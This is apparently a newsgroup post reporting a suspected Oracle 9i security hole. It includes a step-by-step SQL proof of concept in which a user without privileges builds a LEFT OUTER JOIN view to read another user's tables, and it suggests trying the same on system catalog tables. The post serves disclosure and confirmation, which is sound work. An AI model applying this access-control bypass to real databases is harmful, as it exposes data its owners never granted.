9iDB Security Hole?

Anyone with 9i can confirm this?

From: news [mailto:news_at_host.talk.ru] On Behalf Of ... ...relcom.comp.dbms.oracle

connect system/****@database
CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;
CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;
Grant Create Session To us1;
Grant Create Session To us2;
Grant Create Table To us1;
grant unlimited tablespace to us1;
Grant Create View To us2;

Connect us1/us11_at_database;

Create Table t1(c1 Number(1)); 
Insert Into t1(c1) Values(9); 
Create Table t2(c1 Number(1)); 
Insert Into t2(c1) Values(9); 

commit;
Connect us2/us11_at_database;

SQL> Select * From us1.t1;
ORA-00942: table or view does not exist
-- this is expected
SQL> Select * From us1.t2;
ORA-00942: table or view does not exist -- this one too
SQL> Create View aa As Select * From us1.t1; ORA-00942: table or view does not exist -- and this one
SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
>From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;

View created
-- now this one is NOT !!!!!
SQL> select * from aa;

T1_C1 T2_C1
---- ----

   9 9

This effectively means that LEFT OUTER JOIN allows to create views on tables that are normally not visible (provided that unprivileged user knows table and column names).
If you can confirm this basic example, can you also try it on system catalog tables/views? If you can not confirm, please specify your version and platform so that we know which ones are not affected (poster didn't specify version, but I suggest it's 9.0.1.1 on either NT or Linux).

-- 
Vladimir Zakharychev (bob@dpsp-yes.com)                http://www.dpsp-yes.com
Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
All opinions are mine and do not necessarily go in line with those of my employer.